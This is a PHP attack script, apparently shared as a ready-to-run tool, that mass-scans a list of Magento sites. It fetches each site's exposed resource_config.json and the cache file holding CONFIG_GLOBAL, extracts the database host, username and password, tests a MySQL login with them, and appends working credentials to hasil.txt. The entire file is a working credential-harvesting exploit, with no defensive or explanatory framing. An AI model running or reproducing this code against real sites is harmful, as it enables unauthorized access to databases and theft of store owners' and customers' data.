Magento Chache Database

1. <?php
2. # Change the author name don't make you become a coder
3. # @2017 FathurFreakz
4. class curl {
5.     public $curl;
6.     public $debug = false;
7.     public $result;
8.     public $error = array();
9.     public $requestheader;
10.     public $responseheader;
11.     public $cookiepath;
12.     public $responsecookie;
13.     public $requestcookie;
14.     public $headers = array();
15.     public $referer;
16.     public $option = array();
17.     public $httpcode;
18.     public $lasturl;
19.     public $debugvar = array();
20.     public $timeout = 30;
21.    
22.    
23.     function __construct(){
24.         date_default_timezone_set("Asia/Jakarta");
25.         $this->curl = curl_init();
26.         $this->setCookiePath(md5(time()));
27.         $this->setUserAgent("Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4");
28.         $this->setOption(CURLOPT_HEADER, true);
29.         $this->setOption(CURLINFO_HEADER_OUT, true);
30.         $this->setOption(CURLOPT_RETURNTRANSFER, true);
31.         $this->setOption(CURLOPT_FOLLOWLOCATION, true);
32.         $this->setOption(CURLOPT_TIMEOUT, $this->timeout);
33.         $this->setOption(CURLOPT_SSL_VERIFYPEER, false);
34.         $this->setOption(CURLOPT_SSL_VERIFYHOST, 2);
35.     }
36.        
37.     function setOption($option, $value) {
38.         $this->options[$option] = $value;
39.         return curl_setopt($this->curl, $option, $value);
40.     }
41.    
42.     function debug(){
43.         $this->debugvar['DEBUG_ERROR'] = $this->error;
44.         $this->debugvar['DEBUG_REQUEST_HEADERS'] = $this->requestheader;
45.         $this->debugvar['DEBUG_RESPONSE_HEADERS'] = $this->responseheader;
46.         $this->debugvar['DEBUG_LAST_URL'] = $this->lasturl;
47.         $this->debugvar['DEBUG_RESULT'] = $this->result;
48.         return $this->debugvar;
49.     }
50.    
51.     function setHeader($key,$value){
52.         $this->headers[$key] = $value;
53.     }
54.    
55.     function request($method,$url,$var = false){
56.         if(!empty($var)){
57.             $data = (is_array($var) ? http_build_query($var, '', '&') : $var);
58.             $this->setOption(CURLOPT_POSTFIELDS,$data);
59.         }
60.         if(!empty($this->headers) && is_array($this->headers)){
61.             $this->setRequestHeader();
62.         }
63.         $this->setMethod($method);
64.         $this->setOption(CURLOPT_URL,$url);
65.         $this->result = curl_exec($this->curl);
66.         $this->error['code'] = curl_errno($this->curl);
67.         $this->error['msg'] = curl_error($this->curl);
68.         $this->httpcode = curl_getinfo($this->curl, CURLINFO_HTTP_CODE);
69.         $this->lasturl = curl_getinfo($this->curl, CURLINFO_EFFECTIVE_URL);
70.         $this->requestheader = $this->parseHeader(curl_getinfo($this->curl, CURLINFO_HEADER_OUT));
71.         $header_size = curl_getinfo($this->curl, CURLINFO_HEADER_SIZE);
72.         $this->responsecookie = $this->parseCookie(substr($this->result, 0, $header_size));
73.         $this->responseheader = $this->parseHeader(substr($this->result, 0, $header_size));
74.         $this->result = substr($this->result, $header_size);
75.         if($this->debug == true){
76.             var_dump($this->debug());
77.         } else {
78.             return $this->result;
79.         }
80.         $this->unsetMethod($method);
81.         $this->unsetCurl();
82.     }
83.    
84.     function setRequestHeader(){
85.         $headers = array();
86.         foreach ($this->headers as $key => $value) {
87.             $headers[] = $key.': '.$value;
88.         }
89.         $this->setOption(CURLOPT_HTTPHEADER, $headers);
90.     }
91.    
92.    
93.    
94.     function parseHeader($response){
95.         if (!preg_match_all('/([A-Za-z\-]{1,})\:(.*)\\r/', $response, $matches) || !isset($matches[1], $matches[2])){
96.             return false;
97.         }
98.         $headers = [];
99.         foreach ($matches[1] as $index => $key){
100.             $headers[$key] = $matches[2][$index];
101.         }
102.         return $headers;
103.     }
104.    
105.     function setMethod($method){
106.         switch (strtoupper($method)){
107.             case 'HEAD':
108.                 $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
109.                 $this->setOption(CURLOPT_NOBODY, true);
110.                 break;
111.             case 'GET':
112.                 $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
113.                 $this->setOption(CURLOPT_HTTPGET, true);
114.                 break;
115.             case 'POST':
116.                 $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
117.                 $this->setOption(CURLOPT_POST, true);
118.                 break;
119.             default:
120.                 $this->setOption(CURLOPT_CUSTOMREQUEST, $method);
121.         }
122.     }
123.    
124.     function unsetHeader(){
125.         $this->headers = array();
126.     }
127.    
128.     function unsetCurl(){
129.         curl_close($this->curl);
130.         $this->unsetCookie();
131.     }
132.    
133.     function unsetCookie(){
134.         if(file_exists($this->cookiepath)){
135.             unlink($this->cookiepath);
136.         }
137.     }
138.    
139.     function unsetMethod($method){
140.         $this->unsetHeader();
141.         $this->setOption(CURLOPT_URL, false);
142.         $this->setOption(CURLOPT_CUSTOMREQUEST, null);
143.         switch (strtoupper($method)) {
144.             case 'HEAD':
145.                 $this->setOption(CURLOPT_NOBODY, false);
146.                 break;
147.             case 'POST':
148.                 $this->setOption(CURLOPT_POST, false);
149.                 $this->setOption(CURLOPT_POSTFIELDS, false);
150.                 break;
151.         }
152.     }
153.    
154.     function setCookiePath($name){
155.         $path = getcwd(). DIRECTORY_SEPARATOR . "cookie" . DIRECTORY_SEPARATOR . $name;
156.         $this->setOption(CURLOPT_COOKIEJAR, $path);
157.         $this->setOption(CURLOPT_COOKIEFILE, $path);
158.         $this->cookiepath = $path;
159.     }
160.    
161.     function setCookie($key, $value = false){
162.         if(is_array($key)){
163.             foreach($key as $set => $cookie){
164.                 $this->requestcookie[$set] = $cookie;
165.             }
166.         } else {
167.             $this->requestcookie[$key] = $value;
168.             $this->setOption(CURLOPT_COOKIE, http_build_query($this->requestcookie, '', '; '));
169.         }
170.     }
171.    
172.  
173.     function parseCookie($header){
174.        
175.         preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $header, $matches);
176.         $cookies = array();
177.         foreach($matches[1] as $item) {
178.             parse_str($item, $cookie);
179.             $cookies = array_merge($cookies, $cookie);
180.         }
181.         return $cookies;
182.     }
183.    
184.    
185.     function setTimeout($int) {
186.         $this->setOption(CURLOPT_TIMEOUT, intval($int));
187.     }
188.    
189.     function post($url,$var = false){
190.         return $this->request("POST",$url,$var);
191.     }
192.    
193.     function get($url,$var = false){
194.         return $this->request("GET",$url,$var);
195.     }
196.    
197.     function put($url,$var = false){
198.         return $this->request("PUT",$url,$var);
199.     }
200.    
201.     function head($url,$var = false){
202.         return $this->request("HEAD",$url,$var);
203.     }
204.    
205.     function delete($url,$var = false){
206.         return $this->request("DELETE",$url,$var);
207.     }
208.    
209.     public function setUserAgent($ua){
210.         $this->setOption(CURLOPT_USERAGENT, $ua);
211.     }
212.     public function setReferer($referer){
213.         $this->setOption(CURLOPT_REFERER, $referer);
214.     }
215.     public function setSocks($socks){
216.         $this->setOption(CURLOPT_PROXY, $socks);
217.         $this->setOption(CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
218.     }
219.    
220.     function getString($start,$end,$string){
221.         preg_match_all("/" . $start . "(.*?)" . $end . "/sm",$string,$result);
222.         return (isset($result[1][0]) ? $result[1][0] : false);
223.     }      
224. }
225.  
226. class Cache extends curl{
227.     private $db = array('host','username','password','dbname');
228.     private $tmp = array();
229.    
230.     function __construct(){
231.         parent::__construct();
232.     }
233.    
234.     function getVar($content){
235.         $this->tmp['host'] = $this->getString("<host>","<\/host>",$content);
236.         $this->tmp['username'] = $this->getString("<username>","<\/username>",$content);
237.         $this->tmp['password'] = $this->getString("<password>","<\/password>",$content);
238.         $this->tmp['dbname'] = $this->getString("<dbname>","<\/dbname>",$content);
239.         return $this->tmp;
240.        
241.     }  
242.    
243.     function database($host,$user,$pass,$name,$domain){
244.         if (!filter_var($host, FILTER_VALIDATE_IP) === false) {
245.             $ip = $host;
246.         } else {
247.             $ip = $domain;
248.         }
249.  
250.         $connect = @mysqli_connect($ip,$user,$pass,$name);
251.         if(!$connect){
252.             return "Failed";
253.         } else {
254.             return "Success";
255.             mysqli_close($connect);
256.         }
257.     }
258.    
259.     function cache($target){
260.         $resource_config = $this->get($target."/var/resource_config.json");
261.         if(preg_match("/media_directory/i",$resource_config)){
262.             $parse_json = json_decode($resource_config);
263.             $md5 = substr(md5(str_replace('media','app/etc',$parse_json->media_directory)),0,3);
264.             $config_global = $this->get($target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL");
265.             if(preg_match('/backend_forgotpassword/',$config_global)){
266.                     $database = $this->getVar($config_global);
267.                     $status = $this->database($database['host'],$database['username'],$database['password'],$database['dbname'],$target);
268.                     if($status == "Success"){
269.                         echo $target."VULN\n";
270.                     } else {
271.                         echo $target."CAN'T CONNECT DB\n";
272.                     }
273.                     $this->saved($target,$status);
274.             } else {
275.                 echo $target."/var/cache/mage--2/mage---".$md5."_CONFIG_GLOBAL => CONFIG_GLOBAL NOT FOUND\n";
276.             }
277.         } else {
278.             echo $target."/var/resource_config.json => RESOURCE_CONFIG NOT FOUND\n";
279.         }
280.        
281.     }
282.    
283.     function saved($target,$response){
284.         $f = fopen('hasil.txt','a+');
285.         fwrite($f, $target."\n");
286.         foreach($this->tmp as $data => $value){
287.             fwrite($f, $data." : ".$value."\n");
288.         }
289.         fwrite($f,"MysqlConnect : $response\n");
290.         fclose($f);
291.     }
292.    
293.     function execute($file){
294.         if(!file_exists($file)){
295.             die($file . " not found !\n");
296.         } else {
297.             $file = explode("\n",file_get_contents($file));
298.             $no = 0;
299.             foreach($file as $target){
300.                 echo "[".$no."/".count($file)."] ".$this->cache(rtrim($target));
301.                 $no++;
302.             }
303.         }
304.     }
305. }
306. $x = new Cache;
307. if(isset($argv[1]) && !empty($argv[1])){
308.     $x->execute($argv[1]);
309. } else {
310.     die("INVALID");
311. }